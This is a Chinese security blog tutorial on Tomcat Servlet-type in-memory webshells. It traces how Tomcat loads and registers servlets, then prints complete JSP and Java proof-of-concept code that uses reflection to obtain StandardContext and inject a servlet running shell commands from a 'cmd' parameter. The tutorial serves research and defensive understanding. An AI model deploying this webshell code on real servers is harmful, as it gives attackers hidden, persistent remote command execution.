freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Tomcat Servlet 型内存马流程理解与手写 EXP
2022-09-07 16:36:31
所属地 浙江省

Java 内存马系列05:Tomcat 之 Servlet 型内存马

0x01 前言

感觉 Servlet 内存马这块是千人千语吧,难度实在是不小,光是不同 Tomcat 获取 Context 就需要不少,而且 Servlet 还有动态注册一说,难度还是蛮大的。

本文还是从流程 ——> 分析 ——> PoC 这一角度来看内存马

0x02 Servlet 创建

早在我最前面的一篇,关于 Java 内存马的基础文章里面提到过 Servlet,在我眼里它是半个中间件。流程是init()---->doXXX---->destory()

这里我们可以先看一下 Servlet 这个接口有哪些方法

image

Servlet 接口分别有如下几个方法:

public interface Servlet {  
   void init(ServletConfig var1) throws ServletException; // init方法,创建好实例后会被立即调用,仅调用一次。  
  
   ServletConfig getServletConfig();//返回一个ServletConfig对象,其中包含这个servlet初始化和启动参数  
  
   void service(ServletRequest var1, ServletResponse var2) throws ServletException, IOException;  //每次调用该servlet都会执行service方法,service方法中实现了我们具体想要对请求的处理。  
  
   String getServletInfo();//返回有关servlet的信息,如作者、版本和版权.  
  
   void destroy();//只会在当前servlet所在的web被卸载的时候执行一次,释放servlet占用的资源  
}

从 Servlet 接口里面我们可以看得出来,如果我们要写恶意代码,应该是写在 service() 方法里面,所以这里我们直接创建一个恶意的 Servlet,代码如下。

package tomcatShell.Servlet;  
  
import javax.servlet.*;  
import javax.servlet.annotation.WebServlet;  
import java.io.IOException;  
  
// 基础恶意类   
public class ServletTest implements Servlet {  
    @Override  
 public void init(ServletConfig config) throws ServletException {  
  
    }  
  
    @Override  
 public ServletConfig getServletConfig() {  
        return null;  
 }  
  
    @Override  
 public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {  
        String cmd = req.getParameter("cmd");  
 if (cmd !=null){  
            try{  
                Runtime.getRuntime().exec(cmd);  
 }catch (IOException e){  
                e.printStackTrace();  
 }catch (NullPointerException n){  
                n.printStackTrace();  
 }  
        }  
    }  
  
    @Override  
 public String getServletInfo() {  
        return null;  
 }  
  
    @Override  
 public void destroy() {  
  
    }  
}

并且配置 web.xml,这里最好配一下,如果不配后续的分析会比较难。

测试一下,成功!

image

0x03 Servlet 流程分析

前情剧透:Servlet 的流程分析比 Filter 和 Listener 复杂一些

因为 Web 应用程序的顺序是 Listener ----> Filter ----> Servlet,所以我们在调用 Servlet 的时候也会看到之前的 Listener 与 Filter 的流程。

如图,这里我先把断点下在了service()方法,我们可以看到这个地方是有 Filter 的流程的。

image

正式开始分析,我们把断点下在init()方法这里。

image

获取到 HTTP 请求

这里我们肯定还要回去,从前面开始分析。也就是把断点下到HTTP11Processor类的service()方法,重新开始调试。

image

这个HTTP11Processor类是一个网络请求的类,它的作用是处理数据包,而它的service()方法主要是在处理 HTTP 包的请求头,主要做了赋值的工作,后续会通过ByteBuff进行数据解析。

所以这一块并不是很重要,都是一些基础的赋值,我们继续往下走,直接到 343 行这里

this.getAdapter().service(this.request, this.response);

image

跟进,我们去到的是CototeAdapter类的service()方法里, CoyoteAdapter 是 Processor 和 Valve 之间的适配器。

image

首先我们关注传参,传入的参数是org.apache.coyote.Requestorg.apache.coyote.Response类型的对象,后面又进行了getNote()方法的调用。

image

对应的getNote()方法

image

这两个getNote()方法都是取 notes 数组里指定 pos 的对象,也就是去notes[1]的这个对象,note[1]的的值是在CoyoteAdapter#service里设值的。

我们继续往下看,如果request == null,进行一系列的赋值。

image

后续也都是一些基础的赋值啥的,直到 353 行这里

this.connector.getService().getContainer().getPipeline().getFirst().invoke(request, response);

这一行是service()方法里最关键的步骤了

image

比较复杂,我们要逐个分析,首先是变量名 connector,它里面存了我们一整个的 HTTP 包。

image

这里师傅们可以逐个点进去看一下

connector.getService()返回的是 Connector 关联的 Service 属性,也就是StandardService类型的对象。

image

connector.getService().getContainer()返回的是 Service 里的容器 Engine 属性,也就是StandardEngine对象。

image

connector.getService().getContainer().getPipeline()返回的是 StandardEngine 里的 Pipeline 属性,也就是StandardPipeline对象。

image

返回的是StandardPipeline的 Valve 类型的数行 first 或者 basic

image

这里感觉获取不到什么有用的信息,所以直接跳进invoke()方法,StandardEngineValve#inovke()进行了 host 相关的简单判断。再继续往下,host 是 Tomcat 内置的 host。

后续的内容就和 Filter 很类似,也就是多个 invoke 的调用,综上,这其实是一个获取到 HTTP 请求,进行预处理的过程。

读取 web.xml

这里的断点位置是ContextConfig#webConfig(),读取 web.xml 的流程与 Listener 型内存马里面基本类似,但是还是有点不同。

断点位置如图

image

开始调试,首先我们获取到了此项目里面的 web.xml 文件

image

中间内容是处理 Filter,Listener 等信息的代码,所以这里我们直接跳过,到 1115 行的configureContext(webXml);中去

image

跟进,我们看到configureContext()方法也是先获取 Listener,Filter,还有 localeEncodingMappings 等,继续往下走,直到 1281 行这里,开始进行 Servlet 的读取。

image

创建与装载 StandardWrapper

1282 行的语句,createWrapper(),实际上就是创建了 StandardWrpper,后续代码会对它进行加载与处理。

继续往下走,这里很明显,我们将所有的 servlets 保存到了 Wrapper 里面,如图。后面代码做的很大一部分工作都是在把 web.xml 里面的数据写到 StandardWrapper 里面

image

我们继续往下看,后续都是一些添加的操作了,这里我们先跳过了。继续往下看,1334 行,将 Wrapper 添加到 context 中,这里对应的是 StandardContext。

image

后续把 web.xml 中的内容装载进了 StandardWrapper 中。也就是 StandardWrapper 的装载

那么这里我们就应该思考了,Wrapper 里面包含了我们的恶意 Servlet 内存马,那 Wrapper 最后是放到哪里去的呢?

其实是addChild()方法把 Wrapper(这个 Wrapper 后面我们会看到是 StandardWrapper) 放进 StandardContext 里面去了,之后又做了一系列的处理,当时看了很多文章,都交代的很不清楚,我这边带师傅们过一遍。

image

紧接上文,我们跟进addChild()方法,这时候去到的是StandardContext类的addChild()方法,它判断这个 Servlet 是否是 JSP 的 Servlet

image

运行到最后,是这个语句,这里如果环境有问题的师傅可以私聊一下我,我当时也是搭的环境有问题,导致一直在踩坑。

super.addChild(child);

跟进去,发现是它的父类,ContainerBase,这是一个抽象类,当时我一度以为我分析错了,结果发现并不是错误。

ContainerBase类的addChild()方法判断了是否开启全局安全这个配置。

image

继续往下,跟进到addChildInternal()方法里面

image

它首先判断了 log,也就是日志功能是否开启,这些都是无足轻重的,主要是它在 753 行这里调用了这个语句

child.start();

start 方法,就是启动一个线程,在我们 Servlet 里面,也就是开启此 Servlet 的线程,我们跟进去看 Servlet 的线程被启动之后做了什么事。

LifecycleBase.png

这里我们从ContainerBase类进入到了LifecycleBase类,

LifecycleBaseInit.png

LifecycleBase类的start()方法这里先是进行了一些基础的日志判断,后面肯定是会走到init()方法里面进去的,要不然刚开始 start 的一个 Servlet 直接就 stop,是不合理的。

init()里面就是一些基础的赋值,我们这里就不看了,主要看后面的重点部分 ————startInternal()

startInternal.png

跟进去,这里我们就走到了StandardContext#startInternal,如图

StandardWrapperstartInternal.png

往下走,到 5130 行,调用了fireLifecycleEvent(),它主要做了一个解析 web.xml 的工作。

fireLifecycleEvent.png

f8 往下走,就会走到ContextConfig#configureContext方法这里

configureContext.png

这里回来,又把 web.xml 的东西装了一遍,过程有点套娃,但是也可以理解。

总而言之,addChild()方法把 servlet 放进了 children 里面,children 也就是 StandardWrapper,如图。

addChildDown.png

addChild()方法之后,调用addServletMappingDecoded()方法添加映射关系。

将 url 路径和 servlet 类做映射。

addServletMappingDecoded.png

总结一下,Servlet 的生成与动态添加依次进行了以下步骤

通过context.createWapper()创建 Wapper 对象;

设置 Servlet 的LoadOnStartUp的值;

设置 Servlet 的 Name ;

设置 Servlet 对应的 Class ;

将 Servlet 添加到 context 的 children 中;

将 url 路径和 servlet 类做映射。

加载 Servlets

上文我们的分析点是停在了addChild(),以及addChild()之后的addServletMappingDecoded()映射。

这其实是因为我们当时在StandardContext#startInternal中,进了fireLifecycleEvent()方法,又做了一遍 StandardWrapper 装载的工作。

fireLifecycleEvent2.png

所以这里我们重新回到StandardContext#startInternal中,从fireLifecycleEvent()方法往下走。

继续往下走,无非是一些赋值,都不怎么重要,重要的地方在这里:

loadOnStartUp.png

跟进,进入到loadOnStartup()方法

loadOnStartUpCode.png

我们会看到它对loadOnStartUp这个属性进行了判断

JudgeloadOnStartUp.png

对于这个参数:

在 servlet 的配置当中,<load-on-startup>1</load-on-startup>的含义是: 标记容器是否在启动的时候就加载这个 servlet。 当值为 0 或者大于 0 时,表示容器在应用启动时就加载这个 servlet; 当是一个负数时或者没有指定时,则指示容器在该 servlet 被选择时才加载。 正数的值越小,启动该 servlet 的优先级越高。

如果要在 web.xml 里面配置应该如此

<load-on-startup>1</load-on-startup>

这里对应的实际上就是 Tomcat Servlet 的懒加载机制。

很明显这里 web.xml 的内容肯定不是我们可控的,所以必须要把恶意的 Servlet 放到最前面去加载。这是我们的一种思路

如果不进行相关的操作,其实影响也不算大。

0x04 Servlet 内存马编写

上文分析了很长篇幅的 Servlet 工作流程,我们可以总结一下到底做了什么。

小结一下 Servlet 的工作流程

首先获取到 HTTP 请求,这里的处理比较简单,和之前 Filter 流程分析是一样的。

后面读取到 web.xml,并且在 WebConfig 方法里面还创建了一个 StandardWrapper,而我们的 Servlets 都会保存到这个 StandardWrapper 里面;

后续这个 Wrapper 是放到 Context 里面去的,这时候就应该祭出这句名言了:

"一个 Context 对应于一个 Web 应用,可以包含多个 Wrapper。"
"一个 Wrapper 对应一个 Servlet。负责管理 Servlet"

在创建与加载完 StandardWrapper 之后,我们肯定是需要把加载的 Servlets 从 StandardWrapper 里面读取出来,所以这里就到了我们最后的一个过程:加载 Servlets,对应有一个很重要的属性值 ————loadOnStartUp

设想 Servlet 内存马的攻击

分析一下应该如何攻击;有这么几个关键点:

StandardWrapper

StandardContext

恶意 Servlet

这里我直接以流程图来演示吧,更为清晰一些。

AttackRoute.png

  1. 获取StandardContext对象

  2. 编写恶意 Servlet

  3. 通过StandardContext.createWrapper()创建StandardWrapper对象

  4. 设置StandardWrapper对象的loadOnStartup属性值

  5. 设置StandardWrapper对象的ServletName属性值

  6. 设置StandardWrapper对象的ServletClass属性值

  7. StandardWrapper对象添加进StandardContext对象的children属性中

  8. 通过StandardContext.addServletMappingDecoded()添加对应的路径映射

编写 Servlet 内存马的 PoC(.jsp)

获取 StandardContext 对象

StandardContext对象获取方式多种多样

<%   
	Field reqF = request.getClass().getDeclaredField("request");    reqF.setAccessible(true);    Request req = (Request) reqF.get(request);    StandardContext standardContext = (StandardContext) req.getContext();
%>

<%   
	ServletContext servletContext = request.getSession().getServletContext();    Field appContextField = servletContext.getClass().getDeclaredField("context");    appContextField.setAccessible(true);    ApplicationContext applicationContext = (ApplicationContext) appContextField.get(servletContext);    Field standardContextField = applicationContext.getClass().getDeclaredField("context");    standardContextField.setAccessible(true);    StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
%>

编写恶意Servlet

<%!
 
    public class Shell_Servlet implements Servlet {
        @Override
        public void init(ServletConfig config) throws ServletException {
        }
        @Override
        public ServletConfig getServletConfig() {
            return null;
        }
        @Override
        public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {
            String cmd = req.getParameter("cmd");
            if (cmd !=null){
                try{
                    Runtime.getRuntime().exec(cmd);
                }catch (IOException e){
                    e.printStackTrace();
                }catch (NullPointerException n){
                    n.printStackTrace();
                }
            }
        }
        @Override
        public String getServletInfo() {
            return null;
        }
        @Override
        public void destroy() {
        }
    }
 
%>

创建Wrapper对象

<%
    Shell_Servlet shell_servlet = new Shell_Servlet();
    String name = shell_servlet.getClass().getSimpleName();
 
    Wrapper wrapper = standardContext.createWrapper();
    wrapper.setLoadOnStartup(1);
    wrapper.setName(name);
    wrapper.setServlet(shell_servlet);
    wrapper.setServletClass(shell_servlet.getClass().getName());
%>

将 Wrapper 添加进 StandardContext

<%
    standardContext.addChild(wrapper);
    standardContext.addServletMappingDecoded("/shell",name);
%>

完整POC

<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.connector.Request" %>
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.Wrapper" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
 
<%
    Field reqF = request.getClass().getDeclaredField("request");
    reqF.setAccessible(true);
    Request req = (Request) reqF.get(request);
    StandardContext standardContext = (StandardContext) req.getContext();
%>
 
<%!
 
    public class Shell_Servlet implements Servlet {
        @Override
        public void init(ServletConfig config) throws ServletException {
        }
        @Override
        public ServletConfig getServletConfig() {
            return null;
        }
        @Override
        public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {
            String cmd = req.getParameter("cmd");
            if (cmd !=null){
                try{
                    Runtime.getRuntime().exec(cmd);
                }catch (IOException e){
                    e.printStackTrace();
                }catch (NullPointerException n){
                    n.printStackTrace();
                }
            }
        }
        @Override
        public String getServletInfo() {
            return null;
        }
        @Override
        public void destroy() {
        }
    }
 
%>
 
<%
    Shell_Servlet shell_servlet = new Shell_Servlet();
    String name = shell_servlet.getClass().getSimpleName();
 
    Wrapper wrapper = standardContext.createWrapper();
    wrapper.setLoadOnStartup(1);
    wrapper.setName(name);
    wrapper.setServlet(shell_servlet);
    wrapper.setServletClass(shell_servlet.getClass().getName());
%>
 
<%
    standardContext.addChild(wrapper);
    standardContext.addServletMappingDecoded("/servletshell",name);
%>

Servlet 型的内存马无法使所有请求都经过恶意代码,只有访问我们设定的 url 才能触发

Servlet 型内存马的缺点就是必须要访问对应的路径才能命令执行,易被发现。

先访问 Servlet.jsp,完成内存马的注册

RegisterForJSP.png

再访问 servletshell;并带上cmd参数

SuccessJSP.png

编写 Servlet 内存马的 PoC(.java)

思想是类似的,师傅们可以自行复现;这里是需要在 web.xml 里面加上 servlet 的调用的。

package tomcatShell.Servlet;  
  
import org.apache.catalina.Wrapper;  
import org.apache.catalina.connector.Request;  
import org.apache.catalina.core.StandardContext;  
  
import javax.servlet.*;  
import javax.servlet.http.HttpServletRequest;  
import javax.servlet.http.HttpServletResponse;  
import java.io.BufferedReader;  
import java.io.IOException;  
import java.io.InputStream;  
import java.io.InputStreamReader;  
import java.lang.reflect.Field;  
  
public class ServletShell implements Servlet {  
    @Override  
 public void init(ServletConfig servletConfig) throws ServletException {  
  
    }  
  
    @Override  
 public ServletConfig getServletConfig() {  
        return null;  
 }  
  
    @Override  
 public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {  
        Field reqF = null;  
 try {  
            reqF = servletRequest.getClass().getDeclaredField("request");  
 } catch (NoSuchFieldException e) {  
            e.printStackTrace();  
 }  
        reqF.setAccessible(true);  
 Request req = null;  
 try {  
            req = (Request) reqF.get(servletRequest);  
 } catch (IllegalAccessException e) {  
            e.printStackTrace();  
 }  
        StandardContext standardContext = (StandardContext) req.getContext();  
  
 ServletShell servletShell = new ServletShell();  
 String name = servletShell.getClass().getSimpleName();  
  
 Wrapper wrapper = standardContext.createWrapper();  
 wrapper.setLoadOnStartup(1);  
 wrapper.setName(name);  
 wrapper.setServlet(servletShell);  
 wrapper.setServletClass(servletShell.getClass().getName());  
 standardContext.addChild(wrapper);  
 standardContext.addServletMappingDecoded("/shell",name);  
  
 String cmd = servletRequest.getParameter("cmd");  
 if (cmd !=null){  
            try{  
                Runtime.getRuntime().exec(cmd);  
 }catch (IOException e){  
                e.printStackTrace();  
 }catch (NullPointerException n){  
                n.printStackTrace();  
 }  
        }  
    }  
  
    @Override  
 public String getServletInfo() {  
        return null;  
 }  
  
    @Override  
 public void destroy() {  
  
    }  
  
    public synchronized HttpServletResponse getResponseFromRequest(HttpServletRequest var1) {  
        HttpServletResponse var2 = null;  
  
 try {  
            Field var3 = var1.getClass().getDeclaredField("response");  
 var3.setAccessible(true);  
 var2 = (HttpServletResponse)var3.get(var1);  
 } catch (Exception var8) {  
            try {  
                Field var4 = var1.getClass().getDeclaredField("request");  
 var4.setAccessible(true);  
 Object var5 = var4.get(var1);  
 Field var6 = var5.getClass().getDeclaredField("response");  
 var6.setAccessible(true);  
 var2 = (HttpServletResponse)var6.get(var5);  
 } catch (Exception var7) {  
            }  
        }  
  
        return var2;  
 }  
}

0x05 小结

Servlet 型内存马相比于前几种的内存马,更容易被查杀出来,Filter 和 Listener 型内存马更改为简单粗暴,因为它们先于 Servlet 内存马之前插入。

0x06 参考资料

https://goodapple.top/archives/1355

# web安全 # java # tomcat # JAVA安全 # 内存马
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录